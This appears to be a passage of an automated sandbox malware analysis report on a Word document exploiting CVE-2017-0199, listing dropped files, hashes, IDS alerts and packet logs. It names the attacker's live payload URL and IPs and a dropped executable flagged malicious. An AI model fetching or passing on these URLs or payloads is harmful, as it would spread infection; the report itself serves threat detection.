                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:Generic INItialization configuration [folders]
                                                                                                            Category:dropped
                                                                                                            Size (bytes):112
                                                                                                            Entropy (8bit):4.810291428173981
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:M1xM1GgiGh1ThpSm4Ts9WgQlLJGh1ThpSv:Mq4IhpF0gQlLJIhpc
                                                                                                            MD5:9FED88D8EB0ACAD381789CE41B919DA3
                                                                                                            SHA1:B5311631E498233AB90C8F344756DEB99D6CF594
                                                                                                            SHA-256:EA65ADDE668EB2E58B3E5B795AF08DF26E44FC03792A8CC239E037CB8BD55AD0
                                                                                                            SHA-512:B1AD4588FCB15B43DFB145506F6A4DD42F1567EA21CE9641902E35400BDA4DDF953F4359C0A450D9F8F2417C1670AE8ABB4C9B4E051CD6EE4F30B9D53F9CAFAC
                                                                                                            Malicious:false
                                                                                                            Preview:[doc]..millizxc.doc.url=0..0225139776.docx.LNK=0..[folders]..txt on 66.63.187.123.url=0..0225139776.docx.LNK=0..

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\millizxc.doc.url

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<http://66.63.187.123/txt/millizxc.doc>), ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):63
                                                                                                            Entropy (8bit):4.810458098034409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:HRAbABGQYm/WUQlKRGIMJcdG2:HRYFVm/WUQlKf3P
                                                                                                            MD5:40FF6A483D0F52B56EDD5BB19EA7B402
                                                                                                            SHA1:2BF8332B01C0C2E59A595B57F1CFBA9A4D3D37C7
                                                                                                            SHA-256:F3A78963E8244C22BF6464839606C437676D1EFE77F02BEE753DD811DC350A9A
                                                                                                            SHA-512:7393006B520030C44FE3680E9D8B834EC99915461CB72519713E82A77594F18987B8F0B8499AC03FA49B5639E9FBDC70901D0360F0946A87B26546BB58AD97E0
                                                                                                            Malicious:true
                                                                                                            Preview:[InternetShortcut]..URL=http://66.63.187.123/txt/millizxc.doc..

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\txt on 66.63.187.123.url

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<http://66.63.187.123/txt/>), ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):51
                                                                                                            Entropy (8bit):4.544782694827832
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:HRAbABGQYm/WUQlKRGov:HRYFVm/WUQlK/v
                                                                                                            MD5:47EF77F004A4639B2E0BB0202A0A3359
                                                                                                            SHA1:A522CBB09B28684571268313D6380953E3A9F927
                                                                                                            SHA-256:063346BD5274BC632D7EA2C69CDAD435061AA138E0D1EDBEEA2A8FBB7998DCAE
                                                                                                            SHA-512:C7E68FF43EE64F939108B1B0D48621343A9240A5002FE37840CA6835D974C75FBF69F1BBF39D26A4BA59F4CF98916CE9FD81DCC4D50B7E7E8A63D5E2759BA0B0
                                                                                                            Malicious:true
                                                                                                            Preview:[InternetShortcut]..URL=http://66.63.187.123/txt/..

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):162
                                                                                                            Entropy (8bit):2.4797606462020307
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                            MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                            SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                            SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                            SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                            Malicious:false
                                                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2
                                                                                                            Entropy (8bit):1.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                            Malicious:false
                                                                                                            Preview:..

                                                                                                            C:\Users\user\AppData\Roaming\millitingacy20306.exe

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):673280
                                                                                                            Entropy (8bit):7.950689463989715
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:u9f274WApLbklTIHQvo6rhBLS453tQjbkxMty9HwrRwRCDCHcqh2A:KsGFbklceo6rhBLj3yji9NR6qh2A
                                                                                                            MD5:016DBBC401CC2BE3E4ACC1E716E94D47
                                                                                                            SHA1:75DC118C5B299701BD150325C62C2F3526B4F3C1
                                                                                                            SHA-256:96449901EB2DBD91117CD77998AC37C6E9D22B326ECB9EFBAE2383DE2C1CE495
                                                                                                            SHA-512:C89A5226B12FACEC8E6B5E5057B7FA0F023D42FD5D7CDAAE36BB851D3EEE2C9BBC276F7A6901DBEE0AEB2ABFC1C229465347577A45D58241D2081F7499775ABA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w".f.................<...........Z... ........@.. ....................................@..................................Z..W....`............................................................................... ............... ..H............text....:... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............D..............@..B.................Z......H.......\...8?...........................................................0..A....... p........%.9...(.....:... V........%.F...(.....G...(/...*.....&*.....{....*"..}....*....0..h...............%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}....+..(.....*6(/...*.....&*...0..........~G.....+>..E....`.......E...5...E...................`...E........&...+......G. ....Y..+...a..Y.aE...........+..+..... ......[..+.............o.........8m.....X. ...

                                                                                                            C:\Users\user\Desktop\~$25139776.docx.doc

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):162
                                                                                                            Entropy (8bit):2.4797606462020307
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                            MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                            SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                            SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                            SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                            Malicious:false
                                                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:Microsoft Word 2007+
                                                                                                            Entropy (8bit):7.993532775736269
                                                                                                            TrID:
                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                            • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                            • ZIP compressed archive (8000/1) 9.41%
                                                                                                            File name:0225139776.docx.doc
                                                                                                            File size:270'897 bytes
                                                                                                            MD5:f25ef2223bc81c701a2e40dc952d4d0d
                                                                                                            SHA1:5fb9f3c608bc44ec4c169e51f18409a93245e8fe
                                                                                                            SHA256:7e00eaee75fe1d2f2b49ebf83b5c9043f2b4143e8cc87e17ef4a440cc67e604f
                                                                                                            SHA512:7ab319f5094dcb629eca50fd7f57ca781423e08df89caca14488dc17328cd19b9261ad61e8eb903abf389b2ad065b38ea6cf3b5a631af53aa8cb55211156dc1b
                                                                                                            SSDEEP:6144:GyrTTW+ch8x2ZpfRkdxyl+cOpFVozXHN5dOu:pwy2O1c0buXHNXp
                                                                                                            TLSH:514412019D93D4EC8367D911F691352327DE9E236E4349168ABCFB9B6368891DE03F22
                                                                                                            File Content Preview:PK..........;Y...7U... .......[Content_Types].xmlUT...m..fm..fm..f...n.0.E...............e.T.....U..<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y....Iy.\.P.........M..X...s.x/%.9T....s...R..i&...j......:x.O].=.p...Z8.....I........U....Z...........r..s....B

                                                                                                            File Icon

                                                                                                            Icon Hash:2764a3aaaeb7bdbf

                                                                                                            Static OLE Info

                                                                                                            General

                                                                                                            Document Type:OpenXML
                                                                                                            Number of OLE Files:1

                                                                                                            OLE File "0225139776.docx.doc"

                                                                                                            Indicators
                                                                                                            Has Summary Info:
                                                                                                            Application Name:
                                                                                                            Encrypted Document:False
                                                                                                            Contains Word Document Stream:True
                                                                                                            Contains Workbook/Book Stream:False
                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                            Contains Visio Document Stream:False
                                                                                                            Contains ObjectPool Stream:False
                                                                                                            Flash Objects Count:0
                                                                                                            Contains VBA Macros:False

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-09-27T16:00:35.652381+02002024413ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL166.63.187.12380192.168.2.2249163TCP
                                                                                                            2024-09-27T16:00:37.892215+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.12380192.168.2.2249166TCP
                                                                                                            2024-09-27T16:00:38.040573+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.12380192.168.2.2249166TCP
                                                                                                            2024-09-27T16:00:49.391688+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249167158.101.44.24280TCP
                                                                                                            2024-09-27T16:00:55.179687+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249167158.101.44.24280TCP
                                                                                                            2024-09-27T16:00:55.580522+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249169188.114.96.3443TCP
                                                                                                            2024-09-27T16:00:56.516191+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249170193.122.130.080TCP
                                                                                                            2024-09-27T16:00:57.450306+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249171188.114.96.3443TCP
                                                                                                            2024-09-27T16:01:08.250593+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249183188.114.97.3443TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Sep 27, 2024 16:00:23.009094954 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:23.014054060 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:23.014144897 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:23.014305115 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:23.019043922 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:26.744024992 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:26.744148016 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:27.153064966 CEST4916480192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:27.157919884 CEST804916466.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:27.158016920 CEST4916480192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:27.158133984 CEST4916480192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:27.163314104 CEST804916466.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:27.880678892 CEST804916466.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:28.092959881 CEST4916480192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:28.233392954 CEST804916466.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:28.234333038 CEST4916480192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:31.233555079 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:31.238554001 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:31.238653898 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:31.238878012 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:31.243721008 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:31.978637934 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:32.002000093 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:32.007008076 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:32.246141911 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:32.445297003 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:32.726973057 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:32.731929064 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:33.856931925 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:33.856990099 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:33.857037067 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:33.857158899 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:33.857203007 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:33.857306004 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:34.081513882 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:34.081681967 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:34.082953930 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:34.487627983 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:34.583549023 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:34.584893942 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:34.667280912 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:34.672048092 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:34.903320074 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:34.903672934 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:34.908534050 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.153430939 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.188832998 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.193779945 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.362556934 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.433509111 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433571100 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.433648109 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433826923 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433861017 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.433914900 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433927059 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433938026 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433952093 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433957100 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.433967113 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.433970928 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.433986902 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.434000015 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.434290886 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.434303999 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.434315920 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.434333086 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.434345961 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.439193010 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.439219952 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.439243078 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.439263105 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.442737103 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.565445900 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.565484047 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.565494061 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.565505028 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.565505028 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.565531015 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.565536976 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.570380926 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.570430994 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.570432901 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.570473909 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.570547104 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.570597887 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.570770979 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.570815086 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.575324059 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.575366974 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.575423002 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.575463057 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.575524092 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.575567007 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.575719118 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.575762987 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.580344915 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.580384970 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.580626965 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.580684900 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.580735922 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.580780029 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.580872059 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.580909014 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.585164070 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.585206032 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.585503101 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.585542917 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.585639954 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.585680962 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.585731030 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.585772991 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.590117931 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.590157032 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.590434074 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.590487957 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.590495110 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.590537071 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.652380943 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.652395010 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.652427912 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.652468920 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.697920084 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.697952986 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.697964907 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.697973967 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.698002100 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.698009968 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698023081 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698036909 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698052883 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.698066950 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.698508978 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698559046 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.698589087 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698600054 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698623896 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.698787928 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698801041 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.698822975 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.698836088 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.699213982 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.699255943 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.699276924 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.699289083 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.699320078 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.704675913 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.704727888 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.704766989 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.704780102 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.704802036 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.704814911 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.704869986 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.704881907 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.704893112 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.704904079 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.704905033 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.704917908 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.704931021 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.705167055 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.705207109 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.705715895 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.705760002 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.705802917 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.705815077 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.705840111 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.705851078 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.705965996 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.705981016 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.705993891 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.706006050 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.706103086 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.706722975 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.706765890 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.706789970 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.706800938 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.706821918 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.706847906 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.707004070 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.707022905 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.707035065 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:35.707042933 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.707057953 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.707078934 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.707686901 CEST804916366.63.187.123192.168.2.22
